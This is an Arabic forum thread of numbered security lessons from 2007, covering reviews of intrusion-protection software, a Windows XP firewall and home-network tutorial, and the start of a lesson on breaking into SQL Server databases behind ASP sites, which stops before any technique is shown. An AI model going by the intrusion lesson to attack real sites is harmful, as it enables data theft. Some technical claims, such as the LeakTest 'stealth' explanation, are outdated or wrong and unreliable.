العيوب :1- يحمي المستخدم من نفسه عند اختيار الحماية الشامله
2- على المستخدم ادخال كلمة السر عند كل بداية لتشغيل الجهاز قد لايتوقع ان هذا البرنامج ذو السمعة الحسنه هو من انتاج الشباب الفلبيني المتخرجين من جامعة لاديلاس بمانيلا العاصمة . حينما دخلت دول جنوب شرق اسيا الي عالم الانترنت ظهرت في المقابل مافيا جديده تخترق الأنظمه ولأن برامج مضادات الأختراقات هي مكلفه بتلك الدول ولأن الحاجة هي ام الأختراع فقد تمكن ثلة من الشباب الفبيني من تصميم برنامج جيد اسموه الجامر وبالعربية المجمد لأنه يجمد المخترق في مكانه فلا يسمح له بالدخول ولا بالخروج ، يعلقه في موقعه الذي دخل منه حتى يسمح له المستخدم بالخروج.
يقوم الجامر بالحماية من المخترقين خصوصا الذين يستخدمون برنامجي Net Bus و Back Orifice حيث انه يراقب المنافذ لمراقبة اي حركة دخول او خروج للبيانات . ايضا يعطي تنبيها صوتيا مع رسالة موجزه عند محاولة اي شخص للدخول الي الجهاز. يقوم كذلك بأغلاق الثغرات الأمنية التي عاده تترك مفتوحه في برنامج الـ ICQ حيث يغلقها البرنامج بطريقة اليه ودون تدخل من المستخدم . يتحسس الجهاز لوجود ملفات التجسس بداخله حيث يقوم بأزالتها اليا . لديه قدرة اكثر من خارقه على اكتشاف برنامجي التجسس المذكورين اعلاه ويقوم بالغاء بريمجات التجسس الخاصه بهما (ملفات الباتش) اليا كذلك. يوفر ثلاث مستويات للحماية هي على التوالي : الحماية الأوليه عند التشغيل فقط ، والحماية الثانوية عند التشغيل بالأضافة لبعض وسائل الحماية الضرورية الأخرى ، وأخيرا الحماية الشاملة حيث لا يمكن تشغيل اي برنامج من البرامج المخزنه بالجهاز.
3- برنامج Internet Alert 99
الشركة المنتجة : BONZI Software
الموقع على الأنترنت : http://www.bonzi.com/ (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.bonzi.com/%5Cn%5CnThis%20file%20was%20not%20retrieved%20by%2 0Teleport%20Pro,%20because%20it%20is%20addressed%2 0on%20a%20domain%20or%20path%20outside%20the%20bou ndaries%20set%20for%20its%20Starting%20Address.%5C n%5CnDo%20you%20want%20to%20open%20it%20from%20the %20server?%27%29%29window.location=%27http://www.bonzi.com/%27)
الحجم : 2.07 MB
السعر : $ 40
المحاسن : سهل وبسيط تعلمه وتشغيله ، قوي ومتين في حمايته ومنعه للمخترقين
العيوب : يسمح للأخرين بالدخول بأذن من المستخدم (او غيره ان كان الجهاز يستخدمه اكثر من مستخدم)
من برامج الحماية القوية يؤدي الحماية على ثلاثة محاور رئيسية وهي : مراقبة شاملة للمنافذ ، واعطاء تنبيه صوتي عند محاولة الدخول ، وتسجيل رقم المخترق IP والوقت والتاريخ ، ولا يكتفي بكل ذلك بل انه يوضح موقع المخترق من خلال خريطه عالميه تشمل جميع شركات الاتصالات بالعالم كما وانه عند تحديد موقع المخترق فأنه يزود المستخدم باسم مزود الخدمه التي مسجل معها المخترقISP ورقم التليفون والبريد الألكتروني . أخيرا يعمل البرنامج في خلفية نظام التشغيل حيث يشغل حيزا قدره 20 كيلوبايت فقط من الذاكرة
4- برنامج Norton AntiVirus 2007
5- برنامج The Cleaner
6- برنامج Guard Dog
7- برنامج Hoe Guard
8- برنامج At Guard
الخ

Linux Root
, Wed, 27 Jun 2007 14:47:23 +0200
الدرس الخامس والثلاثين
خلال الأسابيع الثلاثة المنصرمة ... تجولت في الأنترنت (بطريقة مختلفه)... من الولايات المتحدة الأمريكية غربا الي اليابان وجنوب شرق اسيا شرقا ، ومن اوروربا واروربا الشرقية شمالا إلي شبة القارة الهندية جنوبا ...

تجوالي اليومي وبمعدل ساعتين كان لهدف معين هو جني اكبر قدر من المعلومات لمساندة ملتزمة الدفاع الذاتي عن أمن المعلومات المخزنه بقواعد بيانات الأقراص الثابته لأجهزة الكمبيوتر الشخصية سواء تلك المنزلية منها او المكتبية.
لم تكن اللغة عائقا في جني بيانات من هذا النوع من المواقع المتعدده والمتشعبه في اعماق الشبكة العنكبوتية العالمية www ، ولكن التحدي الحقيقي كان في غربلة تلك البيانات لإستخلاص المصداقية منها في حقيقة المعلومات المعطاة وحقيقة نجاح تطبيقها . ايضا كان التحدي في ترجمة كثير من المواقع الغير ناطقة بالأنجليزية (الألمانية واليابانية والروسية) الي الأنجليزية ومن ثم ترجمتها الي العربية ناهيك عن ترجمة المواقع الأمريكية وتلك الناطقة بالأنجليزية الي العربية هي الأخرى لنشرها فيما بعد لمن يقراء هذة الرسالة مع العلم بأن الترجمة للإنجليزية قد تمت بواسطة بعض المواقع المتخصصه .
جهد مضني قد بذل لأستخلاص افكار جديده تساند ملتزمة الدفاع الذاتي والتي عن طريقها بإمكان المستخدم العادي للأجهزة الشخصية استغلال تعليمات مبيته بجهازه وأثارتها تكنيكيا لأبتكار جدارا ناريا ذاتيا فولاذيا لايقهر لصد هجوم المخترقين ودون الحاجة الي تحميل تطبيقات وبرامج متخصصه لهذا الغرض.
تستند ملتزمة الدفاع الذاتي (ساتشس) على خمسة أسس مترابطه هي كالتالي :
1- السرية (س) Confidentiality
2- الأمان (أ) Safety
3- التواصل (ت) Connection
4- الشهرة (ش) Notoriety
5- الســبر (س) Probe
وكما يظهر اعلاه فإن كل حرف يمثل مبداء اساسي من ملتزمة الدفاع الذاتي (ساتشس) ومجموعة الحروف الخمسة تكون في مجملها خطا دفاعيا صلبا عند تطبيقاها بديناميكية صحيحه وبتحفز ذاتي للقيم البرمجية المبنية عليها وحدة المعالجة المركزية CPU و نظام التشغيل الخاص بجهاز المستخدم . وبصيغة أخرى فأن ملتزمة الدفاع الذاتي عند تطبيقها على الأجهزة الشخصية تشبة في عملها مايقوم به نظام المناعة الذاتي بالجسم البشري . لأن ملتزمة الدفاع الذاتي إبتكارا شخصيا ، ولأن هناك جهدا كبيرا قد بذل لأخراجها الي النور

Linux Root
, Wed, 27 Jun 2007 14:49:49 +0200
الدرس السادس والثلاثين
الجدار الناري Fire Wall بويندوز XP بروفيشينال ( دورة دراسية خاصة )


يتوفر بإصدارة ويندوز XP بروفيشينال (الخاصة بالأعمال) جدارا ناريا صلدا من اهم مهامة الأساسية

1- التخفي Stealth
2- العمل بقوة في صمت دون مقاطعة المستخدم
3- مساندة الشبكات المحلية
4- الإستغناء كليا وبمصداقية عن تحميل اي تطبيقات خارجية (جدران نارية) لصد عمليات الإختراق
5- سهولة التحميل والتهيئة والعمل في الخلفية دون ادنى تدني لسرعة الجهاز
6- التحديث التلقائي ضمن تحديثات ويندوز XP الدورية
7- الإختبار الفعلي للنظام عبر مركز جيبسون للأبحاث www.grc.com (http://www.grc.com/)

سأبداء بشرح مفاهيم الجدار الناري الذاتي بالويندوز XP بروفيشينال ووميزاته والفروقات الواضحة والخفيه بينه وبين بقية تطبيقات الجدران النارية المتداوله وستكون الدورة الدراسية هذة في ثلاث حلقات متتابعة .
الحلقة الدراسية الأولى
تعريف الجدار الناري :

الجدار الناري او جدار الحماية او Firewall سمه كما تشاء هو تركيبة من الأجهزة والبرامج التي توفر نظام آمن ، تُستخدم عادةً لمنع الوصول غير المصرح به من الخارج إلى شبكة اتصال داخلية أو إنترانت.
يمنع جدار الحماية الاتصال المباشر بين شبكة الاتصال وأجهزة الكمبيوتر الخارجية بواسطة توجيه الاتصال عبر ملقم وكيل خارج شبكة الاتصال . يقرر الملقم الوكيل فيما إذا كان مرور ملف ما عبر شبكة الاتصال آمناً. يدعى جدار الحماية أيضاً عبارة الحد الآمن.

إن الجدار الناري Firewall هو نظام الأمان الذي يعمل كحد وقائي بين شبكة الاتصال والعالم الخارجي . إن جدار حماية اتصال إنترنت Internet Connection Firewall - ICF هو برنامج لتعيين قيود على نوعية المعلومات المتبادلة بين الشبكة المنزلية أو المكتبية الصغيرة وإنترنت.
يمكن لـ ICF أن يحمي الكمبيوتر المفرد المتصل بإنترنت . إذا كان لديك كمبيوتر مفرد متصل بإنترنت بواسطة مودم الكيبل ، أو مودم DSL ، أو مودم الطلب الهاتفي ، يقوم ICF بحماية اتصالك بالإنترنت .
كيفية عمل جدار حماية اتصال إنترنت (ICF) :
يراقب جدار الحماية كافة أوجه الاتصالات التي تعبر مساره ويختبر عنوان الوجهة والمصدر لكل رسالة يعالجها. لمنع حركة المرور غير المطلوبة من الطرف العام للاتصال من دخول الطرف الخاص، يحتفظ ICF بجدول لكافة الاتصالات التي تم إجراؤها من كمبيوتر ICF. في حالة الكمبيوتر المفرد، يتتبع ICF حركة المرور الخاصة بالكمبيوتر. عند استخدامه مع ICS، يتتبع ICF كامل حركة المرور الخاصة بكمبيوتر ICF/ICS والخاصة بأجهزة كمبيوتر شبكة الاتصال الخاصة. تتم مقارنة حركة المرور الواردة من إنترنت مع الإدخالات في الجدول. ويتم السماح لحركة مرور إنترنت الواردة بالوصول إلى أجهزة الكمبيوتر الموجودة على شبكة الاتصال عند وجود إدخال مطابق في الجدول الذي يظهر بدء تبادل الاتصال من ضمن الكمبيوتر أو شبكة الاتصال الخاصة.
يتم إسقاط الاتصالات الناتجة من مصدر خارج كمبيوتر ICF، كإنترنت مثلاً، من قبل جدار الحماية إلا إذا تم إنشاء إدخال في التبويب الخدمات للسماح بالمرور. وعوضاً عن إرسال إعلامات حول النشاط، يقوم ICF بصمت بتجاهل الاتصالات غير المطلوبة، مع إيقاف المحاولات الشائعة للقرصنة مثل مسح المنفذ. إذ أنه يمكن إرسال هذا النوع من الإعلامات بشكل متكرر مما يؤدي إلى تعطيلك عن العمل. عوضاً عن ذلك، يمكن أن يقوم ICF بإنشاء سجل أمان لعرض النشاط المتتبع من قبل جدار الحماية.
يمكن تكوين الخدمات للسماح بإعادة توجيه حركة المرور غير المطلوبة من إنترنت من قبل كمبيوتر ICF إلى شبكة الاتصال الخاصة. على سبيل المثال، إذا كنت تستضيف خدمة ملقم ويب HTTP، وقمت بتمكين الخدمة HTTP على كمبيوتر ICF، فسيتم إعادة توجيه حركة مرور HTTP غير المطلوبة من قبل كمبيوتر ICF إلى ملقم ويب HTTP. تكون مجموعة معلومات العمل والمعروفة بتعريف الخدمة مطلوبة من قبل ICF للسماح بإعادة توجيه حركة مرور إنترنت غير المطلوبة إلى ملقم ويب على شبكة الاتصال الخاصة. لمزيد من المعلومات حول الخدمات، راجع إضافة تعريف الخدمة، و نظرة عامة حول تعريفات الخدمات.
ماذا نستنتج من السطور اعلاه ؟ :
الغازاً ؟ !! ... لا .. ليس بألغاز بقدر ماهي ميكانيكية برمجية على كل متصل بالانترنت التعرف عل اسسها ومبادئها ، ببساطة توفر الجدران النارية المتداوله كالزون الارم والكلين والبلاك ايس ديفندر واللوك داون وغيرها حماية مفردة اي تكون في مجملها جدارا ناريا خاصا بالمستخدم العادي الذي يستخدم كمبيوتر شخصي وحيد ، ولكنها لاتحمي الشبكات سواء المنزلية او الخاصة بالأعمال ، بصيغة اخرى لو أن زيد من الناس ركب شبكة منزلية في بيته مكونه من خمسة اجهزة فسيتعين عليه إستخدام نظاما خاصا لحماية الشبكة ثم تحميل جدار ناريا مفردا لحماية كل جهاز على حده وفوق ذلك عليه اعادة تهيئة كل جدارناري على حدة حتى يتم نجاح اتصال الأجهزة ببعضها عبر الشبكة الداخليه ، لأن الجدران النارية توقف تواصل الأجهزة مالم يتم تهيئتها لذلك.
تختلف طريقة الجدار الناري الخاص بالويندوز XP في طريقة تعامله مع الشبكات ، حيث يقدم حماية مزدوجة القوة للأجهزة الشخصية المرتبطة بالشبكة وللشبكة ذاتها كما هو مشروح اعلاه ، دون التعرض لإتصال الأجهزة الفردية بعضها ببعض عبر الشبكة الداخلية من جانب ، وإتصال الشبكة الداخلية بالأنترنت من جانب أخر.
التخفي Stealth :
لمعرفة مصطلح التخفي في الإنترنت علينا أن نتعرف على ميكانيكية المطاردة والصيد Chasing & Hunting ، حيث يقوم المخترق بأرسال رسالة إستعلامية مرجعية PING عبر تطبيقات الإختراق ليتسنى له تحديد ارقام الأيبي IPs بالأجهزة ذات المنافذ المفتوحة open ports وهذة دلالة واضحة على ان اصحابها لايحملون بها جدراناً نارية او انهم محملين لجدران نارية إلا ان ملفات تجسسة من نوع احصنة طروادة Trojans قد تم زراعتها بأجهزتهم بطريقة او أخرى وقد تمكنت من فتح بعض المنافذ للغزاة . في هذة العجالة نستتج امرين ، الأول ان الجدران النارية تقوم بوضع كتل صلدة في وجة رسائل الـ PING ، كذلك تغلق المنافذ التي تبحث عن ثغراتها تلكم الرسائل المرجعية خلال عملية المطاردة والصيد Chasing & Hunting.
مايميز جدار الحماية بويندوز XP هو عامل التخفي Stealth وهذة الكلمة الإنجليزية اشتهرت بأسم الطائرة الشبح من نوع F18 التي انتجتها امريكا والتي لايستطيع الرادار ان يتصيدها . من هنا تقترن كلمة Stealth بالجدرا الناري المزود بالويندوز XP بروفيشينال وقد وضعته مايكروسوفت في نسخة الأعمال من الويندوز إكس بي ولم تزود به نسخة الهوم إديتشن لأن الأولى مرتبطة بالشبكات ، والشبكات بحاجة الي حماية من كل وسائل وطرق الإختراق المتعارف عليها ، وعليه فإن الجدار الناري هذا يشكل عامل تخفي عجيب حيث لا تكتشف الرسائل المرجعية PINGs اجهزة الكمبيوتر التي تستخدمة وكأنها - اي الكمبيوترات - غير متصلة اساسا بالأنترنت.
الإختبار التجريبي الفعلي :
إن عملية الحماية المزدوجة التي يقدمها الجدار الناري في الويندوز XP بروفيشينال بما فيها من عامل التخفي Stealth يمكن التحقق من ادائها ونجاحها عبر الإختبار الذي يوفره مركز جيبسون للأبحاث Gibson's Research Center عبر الرابط التالي :
http://grc.com/files/leaktest.exe (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://grc.com/files/leaktest.exe%5Cn%5CnThis%20file%20was%20not%20retr ieved%20by%20Teleport%20Pro,%20because%20it%20is%2 0addressed%20on%20a%20domain%20or%20path%20outside %20the%20boundaries%20set%20for%20its%20Starting%2 0Address.%5Cn%5CnDo%20you%20want%20to%20open%20it% 20from%20the%20server?%27%29%29window.location=%27 http://grc.com/files/leaktest.exe%27)
انزل برنامج LeakTest واجرى الفحص خلال تنشيط الجدار الناري .
ستحصل على نتيجة كالتالي :
Unable To Connect
LeakTest was unable to connect to the GRC.COM Web Server.
لماذا ؟؟
لأن الجدار الناري الخاص بالويندوز XP جعل جهازك مخفياً كالشبح Stealth كأنما هو غير مرتبط بالأنترنت ، ولذا لم يتمكن سيرفر مركز ابحاث جيبسون من تحديده لتنفيذ الأختبار. يمكنك شخصيا إجراء إختبار فعلي مماثل للتحقق من فعالية تخفي النظام ، بعد تنشيط الجدار الناري - سنتطرق لهذة العملية بالتفصيل في الحلقة الدراسية القادمة إن شاء الله - حمل جدارا ناريا أخرا بجانب جدار ويندوز XP الناري وراقب ايقونيته ... ستجد انها لاتغمز البته ، وإن حدث وهو نادرا فالسبب اما يعود الي سيرفر مزود الخدمة او الي نشاط الداتا المرسلة من جهازك outbound connections وليست المرسله اليه ، هناك فرق . حسنا ، اوقف خاصية الجدار الناري بالويندوز XP وراقب كم مرة تغمر ايقونية الجدار الناري الخارجي؟؟ ... كثيرا .. اليس كذلك ؟! ... الأن فقط ... أنت الحكم.

Linux Root
, Wed, 27 Jun 2007 14:53:04 +0200
الدرس السابع والثلاثين

تنشيط خيارات سجل الأمان :
تعودنا جميعا عند تحميل الجدران النارية التقليدية مراقبة ايقونية الجدار الناري لملاحظة محاولات الأختراق المضنية ومن ثم متابعة المخترق لتحديد موقعة عبر رقم الأي بي ومعرفة التطبيق الذي يستخدمه للأختراق . ولأننا تعودنا على ذلك فأننا لن نشعر بالأطمئنان في بداية إستخدامنا لجدار مايكروسوفت ويندوز XP الناري ، فلا وجود لإيقونيات تغمز لأرشادنا لتتبع محاولات الإختراق ، ولا وجود لسجل امان معين نضغط على ايقونية التطبيق لنفتحة ونشاهد تلك المحاولات. لماذا ؟ ، بكل بساطة لأن الجدار الناري هذا يختلف في طريقة عمله عن بقية الجدران النارية التقليدية ، فليس من مهامة الرئيسية تحديد محاولات الإختراق وكشف التطبيقات التي يستخدمها المخترقون ، بل هو أسمى من ان يتحسس ميكانيكية الإختراق لأن ليس هناك ميكانيكة للأختراق من الأساس حيث انه يخفي جهاز المستخدم Stealth وكأنما هو ليس بمتصل بالانترنت البته ، وعليه فإن محاولات المخترقين تطارد شبحا في هذه الحالة. على كل حال ، يحتفظ الجدار الناري بسجل خاص لمحاولات الإختراق إن وجدت ، ولكنه لايقاطع المستخدم بالتغميز او إصدار لصوت تنبيهي عند صد كل محاولة للأختراق كما تفعل الجدران النارية التقليدية ، وإنما يعمل في الخلفية دون اية مقاطعة للمستخدم ومتى ما رغب المستخدم في التعرف على سجل محاولات الأختراق للشبح ، فعلية في هذة الحالة فقط الإطلاع على السجل الأمني يدويا وستفاجأه الحقيقة لأنه سيجد السجل فارغا حيث ليس هناك من الأساس صد لمحاولات إختراق لكمبيوتر شبحي.
يسمح سجل أمان جدار حماية اتصال إنترنت (ICF) للمستخدمين المتقدمين باختيار المعلومات الواجب تسجيلها. باستخدام تسجيل أمان ICF يمكنك:
تسجيل الحزم المسلّمة. سيسجّل هذا كافة الحزم المسقطة التي تنشأ من شبكة الاتصال المنزلية أو المكتبية الصغيرة أو من إنترنت. تسجيل الاتصالات الناجحة. سيسجّل هذا كافة الاتصالات الناجحة التي تنشأ من شبكة الاتصال المنزلية أو المكتبية الصغيرة أو من إنترنت.
عند تحديد خانة الاختيار تسجيل الحزم المسلّمة، يتم جمع معلومات حول كل محاولة حركة المرور للانتقال عبر جدار الحماية يتم الكشف عنها ورفضها من قبل ICF. على سبيل المثال، عند عدم تعيين إعدادات بروتوكول رسائل تحكم إنترنت (ICMP) للسماح بطلبات الارتداد الواردة، مثل تلك المرسلة من قبل أوامر Ping، و Tracert، وتم تلقي طلب الارتداد من خارج شبكة الاتصال، يتم إسقاط طلب الارتداد، ويتم إنشاء إدخال في السجل. عند تحديد خانة الاختيار تسجيل الاتصالات الناجحة، يتم جمع معلومات حول كل اتصال ناجح للتنقل عبر جدار الحماية. على سبيل المثال، عند اتصال شخص ما بنجاح بموقع ويب باستخدام Internet Explorer، يتم إنشاء إدخال في السجل. يتم إنشاء سجل الأمان باستخدام تنسيق W3C Extended Log File Format، يتم استخدام تنسيق مشابه للتنسيق المستخدم في أدوات تحليل السجل الشائعة. للحصول على معلومات حول كيفية عرض سجل أمان ICF، راجع عرض سجل الأمان. لحفظ سجل جدار الحماية باستخدام اسم وموقع من اختيارك، راجع تغيير اسم الملف والمسار لسجل الأمان.
لدى سجل أمان جدار حماية اتصال إنترنت مقطعين:
توفر معلومات العنوان معلومات حول إصدار سجل الأمان والحقول المتوفرة لإدخال البيانات. تعرض معلومات العنوان كقائمة ثابتة. إن نص سجل الأمان هو البيانات المترجمة والتي تم إدخالها كنتيجة لمحاولة حركة المرور عبور جدار الحماية. يتم إدخال الحقول في سجل الأمان من اليسار إلى اليمين عبر الصفحة. إن نص سجل الأمان هو قائمة حيوية، حيث يتم إدخال البيانات عند أسفل السجل. يجب تحديد أحد خياري التسجيل أو كليهما ليتم إدخال البيانات ضمن سجل الأمان.
لتمكين خيارات تسجيل الأمان:
- ا فتح اتصالات شبكة الاتصال. - انقر فوق اتصال شبكة الاتصال الذي تم تمكين جدار حماية اتصال إنترنت (ICF) عليه، ثم تحت مهام شبكة - الاتصال، انقر فوق تغيير إعدادات هذا الاتصال. - في التبويب خيارات متقدمة, انقر فوق إعدادات. - في التبويب تسجيل الأمان، تحت خيارات التسجيل، حدد واحد من الخيارات التالية أو كليهما: - لتمكين تسجيل محاولات الاتصال الوارد غير الناجحة، حدد خانة الاختيار تسجيل الحزم المسلّمة. - لتمكين تسجيل الاتصالات الصادرة الناجحة، حدد خانة الاختيار تسجيل الاتصالات الناجحة.
تكوين الشبكة المنزلية او المكتبية وتزويدها بالجدار الناري الداعم:
لم تكن شبكة الاتصال المنزلية أسهل مما هي عليه الآن في Windows XP Professional. يمكن استخدام معالج إعداد شبكة الاتصال لإعداد الشبكة الخاصة بك بسرعة. يمكن مشاركة الاتصال بالإنترنت مع كافة أجهزة الكمبيوتر على الشبكة الخاصة بك وكن مرتاحاً لحماية الكمبيوتر الخاص بك من قبل جدار حماية اتصال إنترنت.
إعداد شبكة الاتصال المنزلية أو المكتبية الصغيرة :
يرشدك معالج إعداد شبكة الاتصال خلال تكوين شبكة الاتصال المنزلية أو المكتبية الصغيرة. يمكن إعداد كافة أجهزة الكمبيوتر على الشبكة الخاصة بك لتستخدم اتصالاً وحيداً بالإنترنت، وتسمية كل كمبيوتر أو تزويده بوصف، وتمكين جدار حماية اتصال إنترنت. يمكنك استخدام معالج إعداد شبكة الاتصال فقط بعد إعداد أجهزة الكمبيوتر وتوصيلها فعلياً.
الإنشاء السهل لشبكة الاتصال المنزلية :
هل تريد مزيداً من المعلومات حول جدوى إعداد شبكة اتصال، وكيفية ذلك؟ في حال وجود جهازي كمبيوتر أو أكثر في المنزل أو في المكتب الصغير، فإن وصلها كشبكة اتصال يزيد من إمكانياتها وربما يوفر عليك المال. عند إعداد شبكة اتصال، يمكن مشاركة الأجهزة (مثل الطابعات والماسحات الضوئية)، ومشاركة اتصال وحيد بالإنترنت، ومشاركة الملفات والمجلدات. يمكن أيضاً تشغيل التسالي التي تعمل على أجهزة كمبيوتر متعددة. يرشدك Windows XP Professional خطوة بخطوة خلال عملية إعداد شبكة الاتصال المنزلية أو المكتبية الصغيرة. شبكة الاتصال هي أكثر من مجرد مجموع مكوناتها. يمكن لأجهزة الكمبيوتر على شبكة اتصال مشاركة اتصال إنترنت، والطابعات وأجهزة أخرى، وعرض الملفات بشكل مشترك. ويمكنك استخدام شبكة الاتصال كذلك للعب ألعاب الكمبيوتر متعددة اللاعبين. إن ربط أجهزة الكمبيوتر لتشكيل شبكة اتصال يزيد كثيراً من إمكانياتها ويمكن أن يوفّر نقودك! هل يحتوي بيتك على جهازي كمبيوتر أو أكثر? عن طريق وصلها بشبكة اتصال، يمكنك:
- أن تتشارك باتصال إنترنت وحيد. يملك Microsoft® Windows® XP ميزة تدعى مشاركة اتصال إنترنت (ICS). وباستخدام ICS, يشارك كمبيوتر واحد, يدعى مضيف ICS, اتصال إنترنت الخاص به مع باقي أجهزة الكمبيوتر على شبكة الاتصال. وعن طريق مشاركة اتصال إنترنت وحيد، يمكنك بشكل متزامن التنقل في ويب على جهازك بينما يقوم فرد آخر من العائلة بمراجعة البريد الإلكتروني على كمبيوتر آخر.
- أن تتشارك بالطابعة، والماسح، والأجهزة الأخرى. قد يكون لديك طابعة متصلة بكمبيوتر في غرفة أخرى. باستخدام شبكة الاتصال المنزلية، يمكنك الطباعة على هذه الطابعة من الكمبيوتر الذي في غرفتك. لم تعد بحاجة إلى نسخ الملف على قرص مرن وأخذه إلى الكمبيوتر الذي يملك الطابعة.
- أن تتشارك بالملفات والمجلدات. افرض أن ابنك طلب إليك النظر إلى تقرير مدرسي موجود على الكمبيوتر في غرفة نومه. عندما تكون أجهزة الكمبيوتر مرتبطة بشبكة اتصال يمكنك, على سبيل المثال, فتح الملف من جهازك، وإجراء التغييرات، ثم حفظ الملف على كمبيوتر ابنك.
- أن تلعب ألعاب الكمبيوتر متعددة اللاعبين. عن طريق شبكات الاتصال ومشاركة اتصال إنترنت، يمكن لأفراد العائلة أن يلعبو ألعاباً على أجهزة كمبيوتر منفصلة مع بعضهم أو على إنترنت. وبينما هم يلعبون، يمكنك أيضاً التنقل في ويب — على سبيل المثال، زيارة مواقع الرياضة والمال المفضلة لديك.
وهناك المزيد: يجعل Microsoft Windows XP استخدام شبكات الاتصال أسهل من أي وقت مضى. ولكن عليك أولاً ربط أجهزة الكمبيوتر ببعضها، عن طريق تثبيت الأجهزة المناسبة في كل منها وعن طريق وصلها بالأسلاك أو بوسائط التقنية اللاسلكية. تشرح هذه المقالة العملية من البداية إلى النهاية. ستتعلم كيف تختار تقنية شبكة الاتصال المناسبة لبيتك، والمكوّنات المناسبة التي يجب الحصول عليها، وكيفية تثبيتها ووصلها بالشكل المناسب. وهناك أيضاً قسم حول حماية شبكة الاتصال المنزلية من المتطفلين الخارجيين عن طريق إنشاء حاجز آمن يدعى جدار الحماية، وهو نفسه الذي يُستخدم في مجال الأعمال.
مشاركة اتصال إنترنت :
استخدم مشاركة اتصال إنترنت لوصل أجهزة كمبيوتر شبكة الاتصال المنزلية بإنترنت بواسطة اتصال وحيد فقط. بواسطة مشاركة اتصال إنترنت، يمكن استخدام برامج استعراض إنترنت وخدمات البريد الإلكتروني من أي كمبيوتر على شبكة الاتصال الخاصة بك، حتى وإن لم يكن ذلك الكمبيوتر موصولاً بالإنترنتز يمكنك بواسطة مشاركة الاتصال بإنترنت (ICS) الاتصال بأجهزة الكمبيوتر الموجودة على الشبكة المنزلية أو المكتبية الصغيرة بإنترنت باستخدام اتصال واحد فقط. على سبيل المثال، لديك كمبيوتر واحد متصل بإنترنت باستخدام اتصال الطلب الهاتفي. وعند تمكين ICS على هذا الكمبيوتر، حيث يدعى مضيف ICS، ستتصل أجهزة الكمبيوتر على شبكة الاتصال بإنترنت باستخدام اتصال الطلب الهاتفي هذا. عند إعداد الشبكة المنزلية أو المكتبية الصغيرة، فمن المستحسن استخدام معالج إعداد شبكة الاتصال في Windows XP Professional لتمكين مشاركة الاتصال بإنترنت. يوفر معالج إعداد شبكة الاتصال تلقائياً كافة إعدادات شبكة الاتصال التي تحتاجها لمشاركة اتصال واحد بإنترنت مع كافة أجهزة الكمبيوتر الموجودة على شبكة الاتصال. بعد تمكين ICS، وبعد التأكد من أن كافة أجهزة الكمبيوتر لديك يمكنها الاتصال مع بعضها ومن أنه يمكنها الوصول إلى إنترنت، يمكنك استخدام برامج مثل Internet Explorer و Outlook Express كما لو أنه تم وصلها مباشرةً مع موفر خدمة إنترنت (ISP). عند إجراء طلب لإنترنت، يتصل كمبيوتر المضيف ICS بـ ISP ويقوم بإنشاء اتصال بحيث تتمكن أجهزة الكمبيوتر الأخرى من الوصول إلى عنوان معين على ويب أو من تحميل بريد إلكتروني. لاختبار اتصال إنترنت والشبكة لديك، تأكد من أنه يمكنك مشاركة الملفات بين أجهزة الكمبيوتر ومن إمكانية كل كمبيوتر من الوصول إلى عنوان ويب. إن مشاركة الاتصال بإنترنت مخصصة للاستخدام في شبكة الاتصال حيث يوجه الكمبيوتر المضيف ICS اتصالات الشبكة بين أجهزة الكمبيوتر وإنترنت. من المفترض أنه في الشبكة المنزلية أو المكتبية الصغيرة، أن يكون لدى الكمبيوتر المضيف ICS اتصال إنترنت الوحيد. بينما قد يكون لدى أجهزة الكمبيوتر الأخرى أجهزة مودم للوصول إلى إنترنت، ويكون الاتصال الأساسي الخاص بهم عبر الكمبيوتر المضيف ICS. عليك تمكين ICS على الاتصال العمومي للشبكة المنزلية أو المكتبية الصغيرة. إذا كان لديك أكثر من محول شبكة اتصال واحد مثبت على الكمبيوتر، فعليك اختيار اتصال الشبكة المحلية الذي يتصل بباقي أجهزة الكمبيوتر على الشبكة المنزلية أو المكتبية الصغيرة. ويدعى هذا أيضاً باتصال شبكة الاتصال الخاصة. إذا تواجد اتصالي شبكة محلية أو أكثر، فعند تمكين ICS، عليك القيام بواحد مما يلي:
حدد اتصال واحد للاتصال بباقي أجهزة الكمبيوتر الموجودة على شبكة الاتصال. لمزيد من المعلومات حول كيفية اختيار الاتصال الخاص، راجع اتصالات شبكة الاتصال الخاصة والعامة. إذا كان لديك اتصالين محليين أو أكثر، وكان جميعها يتصل بباقي أجهزة الكمبيوتر الموجودة على شبكة الاتصال لديك، فعليك استخدام جسر لوصل الاتصالات المحلية قبل تحديد الاتصال بالشبكة المنزلية أو المكتبية الصغيرة. إذا اخترت إنشاء جسر شبكة اتصال يتضمن كافة الاتصالات المحلية بشبكة الاتصال لديك، فيتم تحديد الجسر تلقائياً عند تمكين ICS. وإذا قمت بإنشاء جسر شبكة اتصال لا يتضمن كافة الاتصالات المحلية بشبكة الاتصال لديك، يبقى بإمكانك تحديد الجسر كاتصال خاص.
جدار حماية اتصال إنترنت

يعمل جدار حماية اتصال إنترنت كنظام أمان، يحدد المعلومات المتبادلة من أجهزة الكمبيوتر على شبكة الاتصال الخاصة بك إلى إنترنت، ومن إنترنت إلى أجهزة الكمبيوتر على شبكة الاتصال لديك، يمكن أيضاً تمكين جدار حماية اتصال إنترنت على كافة أجهزة الكمبيوتر على شبكة الاتصال الخاصة بك، حتى وإن كانت أجهزة الكمبيوتر تشترك باتصال وحيد بالإنترنت.

Linux Root
, Wed, 27 Jun 2007 14:56:49 +0200
الدرس الثامن والثلاثين
اخواني الكرام ....
في هذا الدرس سوف نتحدث عن بعض الطرق او المهارات في إختراق الاس كيو ال انا اعتقد ان هذا الملف ليس بالمستوى المطلوب
لكنها محاولات بسيطة ارجوا ان تفيد الجميع .

س :في البداية ماهي الاس كيو ال ( SQL )؟؟

الاس كيو ال هي عبارة عن قاعد بيانات تحتوي على جداول واغلب المواقع التي تكون صفحاتها منتهية ب ASP هي صفحات تسحب بياناتها
من قاعدة SQL وصفحات ASP ممكن ان تكون كنز من المعلومات لاختراق قواعد بيانات SQL وهذا ماسوف اشير اليه لاحقا ، و SQL
تتنصت على البورت 1433
ايضا مااريد ان اخبرك به ان ال SQL قد تحتوي على اكثر من قاعدة بيانات وكل قاعدة بيانات تحتوي على عدد من الجداول يمكن
ان تتصور كبرقواعد بيانات SQL والعدد الكبير من البيانات التى تحتويها .

س : مالذي يمكن ان استفيد منه اذا اخترقت قاعدة بيانات SQL ؟
هذا على حسب نشاط الموقع اذا كان هذا الموقع منتدى لا اقصد منتديات PHP بل منتديات ASP في الغالب سوف تحصل على جميع اسماء
